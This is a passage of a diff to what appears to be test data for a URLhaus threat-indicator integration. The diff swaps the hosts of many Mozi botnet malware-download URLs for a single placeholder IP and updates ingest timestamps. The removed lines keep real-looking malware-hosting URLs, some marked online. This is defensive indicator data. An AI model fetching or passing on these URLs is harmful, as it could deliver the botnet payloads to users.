"{\"id\":\"960898\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960898/\",\"url\":\"http://117.247.206.115:59110/Mozi.a\",\"url_status\":\"offline\",\"host\":\"117.247.206.115\",\"date_added\":\"2021-01-14 15:35:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029379700Z", + "original": "{\"id\":\"960898\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960898/\",\"url\":\"http://89.160.20.156:59110/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -31580,18 +31580,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://119.198.43.18:51476/Mozi.m", + "original": "http://89.160.20.156:51476/Mozi.m", "scheme": "http", "port": 51476, - "domain": "119.198.43.18", - "full": "http://119.198.43.18:51476/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51476/Mozi.m" }, - "ip": "119.198.43.18" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694961433Z", - "original": "{\"id\":\"960899\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960899/\",\"url\":\"http://119.198.43.18:51476/Mozi.m\",\"url_status\":\"online\",\"host\":\"119.198.43.18\",\"date_added\":\"2021-01-14 15:35:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029386400Z", + "original": "{\"id\":\"960899\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960899/\",\"url\":\"http://89.160.20.156:51476/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -31629,18 +31629,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.124.94.169:58839/Mozi.m", + "original": "http://89.160.20.156:58839/Mozi.m", "scheme": "http", "port": 58839, - "domain": "182.124.94.169", - "full": "http://182.124.94.169:58839/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:58839/Mozi.m" }, - "ip": "182.124.94.169" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694966111Z", - "original": "{\"id\":\"960897\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960897/\",\"url\":\"http://182.124.94.169:58839/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.124.94.169\",\"date_added\":\"2021-01-14 15:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029392900Z", + "original": "{\"id\":\"960897\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960897/\",\"url\":\"http://89.160.20.156:58839/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -31678,18 +31678,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.46.166.16:50249/Mozi.m", + "original": "http://89.160.20.156:50249/Mozi.m", "scheme": "http", "port": 50249, - "domain": "125.46.166.16", - "full": "http://125.46.166.16:50249/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50249/Mozi.m" }, - "ip": "125.46.166.16" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694971872Z", - "original": "{\"id\":\"960894\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960894/\",\"url\":\"http://125.46.166.16:50249/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.46.166.16\",\"date_added\":\"2021-01-14 15:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029399500Z", + "original": "{\"id\":\"960894\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960894/\",\"url\":\"http://89.160.20.156:50249/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -31727,18 +31727,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://123.4.250.147:46173/Mozi.m", + "original": "http://89.160.20.156:46173/Mozi.m", "scheme": "http", "port": 46173, - "domain": "123.4.250.147", - "full": "http://123.4.250.147:46173/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:46173/Mozi.m" }, - "ip": "123.4.250.147" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694975960Z", - "original": "{\"id\":\"960895\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960895/\",\"url\":\"http://123.4.250.147:46173/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.4.250.147\",\"date_added\":\"2021-01-14 15:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029406Z", + "original": "{\"id\":\"960895\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960895/\",\"url\":\"http://89.160.20.156:46173/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -31776,18 +31776,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.124.57.87:43785/Mozi.m", + "original": "http://89.160.20.156:43785/Mozi.m", "scheme": "http", "port": 43785, - "domain": "182.124.57.87", - "full": "http://182.124.57.87:43785/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:43785/Mozi.m" }, - "ip": "182.124.57.87" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694979967Z", - "original": "{\"id\":\"960896\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960896/\",\"url\":\"http://182.124.57.87:43785/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.124.57.87\",\"date_added\":\"2021-01-14 15:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029412600Z", + "original": "{\"id\":\"960896\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960896/\",\"url\":\"http://89.160.20.156:43785/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -31825,18 +31825,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://113.92.159.37:46924/Mozi.m", + "original": "http://89.160.20.156:46924/Mozi.m", "scheme": "http", "port": 46924, - "domain": "113.92.159.37", - "full": "http://113.92.159.37:46924/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:46924/Mozi.m" }, - "ip": "113.92.159.37" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694984225Z", - "original": "{\"id\":\"960893\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960893/\",\"url\":\"http://113.92.159.37:46924/Mozi.m\",\"url_status\":\"online\",\"host\":\"113.92.159.37\",\"date_added\":\"2021-01-14 15:34:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029419100Z", + "original": "{\"id\":\"960893\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960893/\",\"url\":\"http://89.160.20.156:46924/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:34:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -31874,18 +31874,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://113.195.165.157:59734/Mozi.m", + "original": "http://89.160.20.156:59734/Mozi.m", "scheme": "http", "port": 59734, - "domain": "113.195.165.157", - "full": "http://113.195.165.157:59734/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59734/Mozi.m" }, - "ip": "113.195.165.157" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694988684Z", - "original": "{\"id\":\"960892\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960892/\",\"url\":\"http://113.195.165.157:59734/Mozi.m\",\"url_status\":\"online\",\"host\":\"113.195.165.157\",\"date_added\":\"2021-01-14 15:34:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029425700Z", + "original": "{\"id\":\"960892\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960892/\",\"url\":\"http://89.160.20.156:59734/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:34:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -31923,18 +31923,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://103.84.240.178:51620/Mozi.m", + "original": "http://89.160.20.156:51620/Mozi.m", "scheme": "http", "port": 51620, - "domain": "103.84.240.178", - "full": "http://103.84.240.178:51620/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51620/Mozi.m" }, - "ip": "103.84.240.178" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694994144Z", - "original": "{\"id\":\"960889\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960889/\",\"url\":\"http://103.84.240.178:51620/Mozi.m\",\"url_status\":\"offline\",\"host\":\"103.84.240.178\",\"date_added\":\"2021-01-14 15:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029432400Z", + "original": "{\"id\":\"960889\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960889/\",\"url\":\"http://89.160.20.156:51620/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -31972,18 +31972,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://115.54.239.78:42585/Mozi.a", + "original": "http://89.160.20.156:42585/Mozi.a", "scheme": "http", "port": 42585, - "domain": "115.54.239.78", - "full": "http://115.54.239.78:42585/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:42585/Mozi.a" }, - "ip": "115.54.239.78" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694998382Z", - "original": "{\"id\":\"960890\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960890/\",\"url\":\"http://115.54.239.78:42585/Mozi.a\",\"url_status\":\"online\",\"host\":\"115.54.239.78\",\"date_added\":\"2021-01-14 15:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029439Z", + "original": "{\"id\":\"960890\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960890/\",\"url\":\"http://89.160.20.156:42585/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -32021,18 +32021,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://103.46.242.87:57941/Mozi.m", + "original": "http://89.160.20.156:57941/Mozi.m", "scheme": "http", "port": 57941, - "domain": "103.46.242.87", - "full": "http://103.46.242.87:57941/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57941/Mozi.m" }, - "ip": "103.46.242.87" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.695002249Z", - "original": "{\"id\":\"960891\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960891/\",\"url\":\"http://103.46.242.87:57941/Mozi.m\",\"url_status\":\"offline\",\"host\":\"103.46.242.87\",\"date_added\":\"2021-01-14 15:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029445600Z", + "original": "{\"id\":\"960891\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960891/\",\"url\":\"http://89.160.20.156:57941/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -32070,18 +32070,18 @@ "provider": "geenensp", "url": { "path": "/i", - "original": "http://115.52.17.165:38308/i", + "original": "http://89.160.20.156:38308/i", "scheme": "http", "port": 38308, - "domain": "115.52.17.165", - "full": "http://115.52.17.165:38308/i" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38308/i" }, - "ip": "115.52.17.165" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.695006106Z", - "original": "{\"id\":\"960888\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960888/\",\"url\":\"http://115.52.17.165:38308/i\",\"url_status\":\"online\",\"host\":\"115.52.17.165\",\"date_added\":\"2021-01-14 15:32:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.029452200Z", + "original": "{\"id\":\"960888\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960888/\",\"url\":\"http://89.160.20.156:38308/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:32:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -32119,18 +32119,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.227.222.174:55281/Mozi.m", + "original": "http://89.160.20.156:55281/Mozi.m", "scheme": "http", "port": 55281, - "domain": "42.227.222.174", - "full": "http://42.227.222.174:55281/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:55281/Mozi.m" }, - "ip": "42.227.222.174" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.695010144Z", - "original": "{\"id\":\"960887\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960887/\",\"url\":\"http://42.227.222.174:55281/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.227.222.174\",\"date_added\":\"2021-01-14 15:22:44 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029458800Z", + "original": "{\"id\":\"960887\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960887/\",\"url\":\"http://89.160.20.156:55281/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:22:44 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -32168,18 +32168,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://42.233.232.90:57662/Mozi.a", + "original": "http://89.160.20.156:57662/Mozi.a", "scheme": "http", "port": 57662, - "domain": "42.233.232.90", - "full": "http://42.233.232.90:57662/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57662/Mozi.a" }, - "ip": "42.233.232.90" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.695014282Z", - "original": "{\"id\":\"960886\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960886/\",\"url\":\"http://42.233.232.90:57662/Mozi.a\",\"url_status\":\"online\",\"host\":\"42.233.232.90\",\"date_added\":\"2021-01-14 15:22:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029465800Z", + "original": "{\"id\":\"960886\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960886/\",\"url\":\"http://89.160.20.156:57662/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:22:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -32217,18 +32217,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.97.173.255:40738/Mozi.m", + "original": "http://89.160.20.156:40738/Mozi.m", "scheme": "http", "port": 40738, - "domain": "59.97.173.255", - "full": "http://59.97.173.255:40738/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40738/Mozi.m" }, - "ip": "59.97.173.255" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.695018410Z", - "original": "{\"id\":\"960885\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960885/\",\"url\":\"http://59.97.173.255:40738/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.97.173.255\",\"date_added\":\"2021-01-14 15:22:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029472300Z", + "original": "{\"id\":\"960885\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960885/\",\"url\":\"http://89.160.20.156:40738/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:22:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -32266,18 +32266,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.99.93.5:59018/Mozi.m", + "original": "http://89.160.20.156:59018/Mozi.m", "scheme": "http", "port": 59018, - "domain": "59.99.93.5", - "full": "http://59.99.93.5:59018/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59018/Mozi.m" }, - "ip": "59.99.93.5" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.695022327Z", - "original": "{\"id\":\"960884\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960884/\",\"url\":\"http://59.99.93.5:59018/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.93.5\",\"date_added\":\"2021-01-14 15:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029478900Z", + "original": "{\"id\":\"960884\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960884/\",\"url\":\"http://89.160.20.156:59018/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -32315,18 +32315,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://39.66.175.56:60279/Mozi.a", + "original": "http://89.160.20.156:60279/Mozi.a", "scheme": "http", "port": 60279, - "domain": "39.66.175.56", - "full": "http://39.66.175.56:60279/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:60279/Mozi.a" }, - "ip": "39.66.175.56" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.695026234Z", - "original": "{\"id\":\"960880\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960880/\",\"url\":\"http://39.66.175.56:60279/Mozi.a\",\"url_status\":\"online\",\"host\":\"39.66.175.56\",\"date_added\":\"2021-01-14 15:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029487Z", + "original": "{\"id\":\"960880\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960880/\",\"url\":\"http://89.160.20.156:60279/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -32364,18 +32364,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://27.216.188.167:52738/Mozi.m", + "original": "http://89.160.20.156:52738/Mozi.m", "scheme": "http", "port": 52738, - "domain": "27.216.188.167", - "full": "http://27.216.188.167:52738/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52738/Mozi.m" }, - "ip": "27.216.188.167" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.695030813Z", - "original": "{\"id\":\"960881\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960881/\",\"url\":\"http://27.216.188.167:52738/Mozi.m\",\"url_status\":\"online\",\"host\":\"27.216.188.167\",\"date_added\":\"2021-01-14 15:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029494Z", + "original": "{\"id\":\"960881\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960881/\",\"url\":\"http://89.160.20.156:52738/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -32413,18 +32413,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://60.212.123.142:37394/Mozi.m", + "original": "http://89.160.20.156:37394/Mozi.m", "scheme": "http", "port": 37394, - "domain": "60.212.123.142", - "full": "http://60.212.123.142:37394/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:37394/Mozi.m" }, - "ip": "60.212.123.142" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.695034740Z", - "original": "{\"id\":\"960882\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960882/\",\"url\":\"http://60.212.123.142:37394/Mozi.m\",\"url_status\":\"online\",\"host\":\"60.212.123.142\",\"date_added\":\"2021-01-14 15:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029500500Z", + "original": "{\"id\":\"960882\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960882/\",\"url\":\"http://89.160.20.156:37394/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -32462,18 +32462,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://58.249.22.13:56491/Mozi.m", + "original": "http://89.160.20.156:56491/Mozi.m", "scheme": "http", "port": 56491, - "domain": "58.249.22.13", - "full": "http://58.249.22.13:56491/Mozi.m" + "domain": 